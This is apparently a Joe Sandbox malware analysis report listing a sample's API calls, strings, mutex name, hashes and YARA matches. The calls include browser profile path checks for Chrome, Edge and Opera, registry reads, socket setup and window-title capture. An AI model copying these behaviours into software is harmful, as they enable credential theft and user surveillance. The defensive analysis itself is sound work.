                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-2800177040
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,0000001C,00000000,-00000002,00000000), ref: 100061BB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: AppData$\Opera Software\Opera Stable
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1162561444
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 1000644B
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • \Microsoft\Edge\Application\msedge.exe, xrefs: 1000642B
                                                                                                                                                                                                                                                                                                                              • ProgramFiles, xrefs: 100063D6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1265440269
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4d6c7aecff4a5cf372fd0c542226d917747f012b197270284a3a5c4471654fcb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3486840681a8c9b7979fbf1c3b21a1cb547e06702c49159833d47058733cd9d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d6c7aecff4a5cf372fd0c542226d917747f012b197270284a3a5c4471654fcb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F821D675D00204DBEB14DFA8CC05BEFB7F9FF08784F608519E916A3284DB74A9058BA0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 10005FBB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-4188645398
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d6f36605941e29b4e518cb00cbc8439ec4a4da0f67758156a23e7e18ed3b3d03
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 77d355c08a898f8e50a63f28947c03bc0e31e75e4281b3d97ed022a44253448f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6f36605941e29b4e518cb00cbc8439ec4a4da0f67758156a23e7e18ed3b3d03
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E21A175D04205DAEB14DFA8CC05BEFB7F8EF08741F508529E816A3284DB74A5058BA0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                                              • String ID: fyhstga-ONSWMZ
                                                                                                                                                                                                                                                                                                                              • API String ID: 1925916568-3275725708
                                                                                                                                                                                                                                                                                                                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 100044DE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 100044E4
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 100044F8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_taskException@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3598223435-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4acf8bbac3f2c21882ea0e06343d40b90099298c012174ff2abe7d7d1e891cfc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 504104F1A00A018BF724DF68D880719B7E5EB452D1F120B2DE8538B68ADF70E944C7A6
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• RegCloseKey.KERNEL32(00000000), ref: 0041269D
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
• RegCloseKey.KERNEL32(?), ref: 00412500
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
• RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3677997916-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID:
• String ID: string too long
• API String ID: 0-2556327735
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: xAG
• API String ID: 176396367-2759412365
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 10005126
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• API String ID: 909987262-2556327735
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
APIs
• _free.LIBCMT ref: 0044B9EF
  • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
• RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,00431FE7,00000000,0000000F,0042EA4D,?,?,00430AB6,?,00000000), ref: 0044BA2B
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: AllocateHeap$_free
• String ID:
• API String ID: 1482568997-0
• Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
• Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
• Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
• Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
• Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
• Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
• Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
  • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,?,00433E19,00000000,00000000,?,?,?,?,?,?,00433E19,?,0046D5EC), ref: 00437C47
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID:
• API String ID: 3476068407-0
• Opcode ID: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
• Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
• Opcode Fuzzy Hash: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
• Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
APIs
• GetForegroundWindow.USER32 ref: 0041AC84
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
• Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
• Opcode Fuzzy Hash: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
• Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00433637,?,?,00402BE9,?,00402629,00000000,?), ref: 00448757
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
